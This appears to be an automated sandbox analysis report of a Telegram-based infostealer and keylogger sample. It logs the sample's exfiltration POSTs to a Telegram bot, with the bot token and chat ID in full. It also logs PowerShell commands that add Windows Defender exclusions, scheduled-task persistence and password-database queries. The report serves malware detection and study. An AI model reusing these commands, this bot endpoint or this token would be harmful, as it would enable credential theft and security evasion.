                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 18469Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2812Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 4132Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2449Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2515Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                    Source: global trafficDNS traffic detected: DNS query: showip.net
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 18469Connection: Keep-AliveCache-Control: no-cache
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: XgbXowhljC.exe, 0000000B.00000002.2291217651.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/e-
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/.
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/0
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/8
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/Z
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/api.telegram.org
                    Source: oS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=t
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407510611.0000000004010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/mplates
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/ocUnique
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF91808 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0BF91808
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF917F8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0BF917F8

                    System Summary

                    Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000000.2158930422.0000000000872000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2262162554.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2268891824.0000000007580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000447000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exeBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XgbXowhljC.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, vaPwDR8wrxM670fQud.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: _0020.AddAccessRule
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000447000.00000040.00000400.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: (K@*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: oS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: D*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/52@3/2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF214.tmp
                    Source: oS6KsQIqJxe038Y.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: oS6KsQIqJxe038Y.exeBinary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
                    Source: LogganchedTSADAsTxnerPUZbggalesaurus.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: oS6KsQIqJxe038Y.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile read: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeAutomated click: Continue
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
